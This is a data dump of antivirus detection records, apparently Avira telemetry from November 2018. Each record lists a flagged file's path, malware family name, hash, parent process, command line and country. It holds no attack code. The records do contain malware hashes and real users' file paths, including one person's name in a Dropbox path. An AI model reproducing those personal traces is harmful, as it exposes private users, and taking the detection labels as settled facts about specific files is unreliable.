  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-10-30-56.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-31T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T13:10:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131339-221f5973', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131339-221F5973', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T07:39:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-070313-f5746388', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed1912db\\AVSCAN-20181104-070252-F217D23B\\AVSCAN-20181104-070313-F5746388', filesize=320000, name='TR/Nitol.blanu.#M1.#R1'), hash='8c1136d1fc2225d0dfd1ba05598ac89630dc8f40032282f06e76c1c923c59d3c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:03:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\1.8\\1.8-natives-1848218975841\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='1de91cca15f9f117f2f7b5d190de6050c3665c12ad038aa12368640f78c00ad3', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-04T05:11:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='atu.exe', filepath='\\\\?\\E:\\ATU.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:04:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T21:20:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211300-c1ee70e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-211300-C1EE70E3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:13:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7493910\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\bitcomet_setup.exe', parentsize=2690240, timestamp='2018-11-04T22:45:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='synhelper.exe', filepath='C:\\Users\\X\\AppData\\Local\\Nabigoga\\SynHelper.exe', filesize=2240000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='9d4c3e45fe2bbf975aca11932710ef053d12b6df0f95050ea899931162733486', metadata=Row(cmdline='-k netsvcs -p -s Schedule', country='BO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T14:09:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered donad', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered donad', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='25d15dfae56e82fc98d308f15accee6c3d6dbc5e04c9a7dab5fa50c57e75ded5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:40:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130537-fdc25578', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130537-FDC25578', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:05:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131024-137576b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131024-137576B5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000192b2', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000192b2', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224918-e2c1dc83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200344-27575B99\\AVSCAN-20181104-224918-E2C1DC83', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=896000, name='W32/Induc.blr.#M1.#R1'), hash='13594ed39540c52effe447fd09da06c619907d33e49db5dac9aee92f8a6858df', metadata=Row(cmdline='-secured -Embedding', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\wbem\\WmiPrvSE.exe', parentsize=419328, timestamp='2018-11-04T17:02:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='newphotos_ncdownloader.exe', filepath='E:\\Games\\GTA4\\Tools\\newphotos_NCDownloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='87614727a4b4c68dd5996afb1a7cb772ad12ea42adf704e59742fe94a24a2dfd', metadata=Row(cmdline='\\\\\\/si \\\\\\"E:\\\\\\\\Daten\\\\\\\\Esprimo\\\\\\\\System\\\\\\\\Users\\\\\\\\User\\\\\\\\Pictures\\\\\\\\_MG_1445.jpg\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Program Files (x86)\\ACD Systems\\ACDSee\\10.0\\ACDSee10.exe', parentsize=11031888, timestamp='2018-11-04T14:59:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151934-87ca5f01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b490ecb4\\AVSCAN-20181104-150815-28F17862\\AVSCAN-20181104-151934-87CA5F01', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='9ed2e3bac10b5c44b5b3a4eadc9b057fc1c98cf00570e49e09806712625f0c3f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:19:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='\\\\?\\C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='8ba58d7e5242b98278fc9c0958f117e4605fe8da6b9b5c92260594dfe2cb0d7e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:38:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xcopy.exe', filepath='C:\\Windows\\System32\\xcopy.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c786b1c3006f9154eaf7cd6ca3c9321d66a92b3bb7df722c27e040ce08aeab69', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:08:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016 (1).exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016 (1).exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T02:03:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:16:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211126-d2b130a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-211126-D2B130A0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:11:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:32:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:14:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool_rt\\msIExEc64.ExE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=4355024, timestamp='2018-11-04T13:18:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200903-303b815c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200903-303B815C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vc_redist.x64.exe', filepath='\\\\tawasul-server\\برامج منذر\\البرامج الهامة\\vc_redist.x64.exe', filesize=14572000, name='TR/Patched.Gen.#M300.#R3374'), hash='809913d1e4dbc9599cad663e6bdf512c357c780dbc764d2c24d1a78e3b8da449', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T16:17:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='F:\\Backup\\LwD\\Praxis\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='c379a71d8903b9ec14591bdb3e85716dcd3cbf55fef97fa614f787c2878b2b7a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\Tägliche Sicherung.buj\\\\\\" \\\\\\/force \\\\\\/hide \\\\\\/wait:3', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10482688, timestamp='2018-11-04T20:23:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200213-6dd43aad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1d9ed844\\AVSCAN-20181104-200022-6105CB86\\AVSCAN-20181104-200213-6DD43AAD', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:59:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\users\\X\\downloads\\mcneel rhinoceros 6 6.1.18023.13161\\patch\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4515256, timestamp='2018-11-04T15:24:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='5e4b1c51a31cd5d70a98e1324832fd1164f725970f2dccd59429297f766757e5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T12:00:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:43:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00062159', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp00062159', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T09:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173210-a50a21a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10135bc4\\AVSCAN-20181104-172847-8E9DA678\\AVSCAN-20181104-173210-A50A21A4', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='242dcedd1ac674fc3b63637faf71ca6efd0c7aea7a382837ed25eec44cb11587', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T22:57:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153740-7c374469', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0ce9a49\\AVSCAN-20181104-153711-7838F9E4\\AVSCAN-20181104-153740-7C374469', filesize=64000, name='TR/Kazy.64000.13.#M1.#R1'), hash='63cca7c71b7d914ec4cb900dea1c1de7e17481d8e9a3b1b1e87ca301df283f7e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:37:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:24:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered disoc', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered disoc', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='bc83b5db2dd32e9b8ba7fa5257606a1d27ef6d9d14b6040152a1c52af8355261', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T17:34:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-211756-8e7fee8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_672ae94a\\AVSCAN-20181101-205319-E2EB6CFC\\AVSCAN-20181101-211756-8E7FEE8C', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='b63fc62de0e3ebee613d119c2b50e30f7adc7e50e0a45047f7f0cdb710bf27b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:17:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ytdsetup.exe', filepath='E:\\Hannes\\YTDSetup.exe', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T08:57:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deviceeject.exe', filepath='d:\\windows\\system32\\DeviceEject.exe', filesize=576000, name='W32/Virut.Gen.#M1.#R1'), hash='a624427223958e30cf7a350661269c124454a2de40b7392a1e4fe0f18aee1412', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:29:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T17:05:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Program Files (x86)\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='82d0187b163f5a6dc502ecba80d7f08f2edc71d9ac4de685c3f3af0809cece5c', metadata=Row(cmdline='-x -s 4000', country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\dw20.exe', parentsize=33936, timestamp='2018-11-02T23:11:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='german.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\LANGUAGE\\GERMAN\\GERMAN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D2CC39370B7C63899AA2B4E7AFDC77D21194E09B48CEAB0F1A975053EB8C3D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsw337F.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:31:54Z'), dt=datetime.date(2018, 11, 2)),
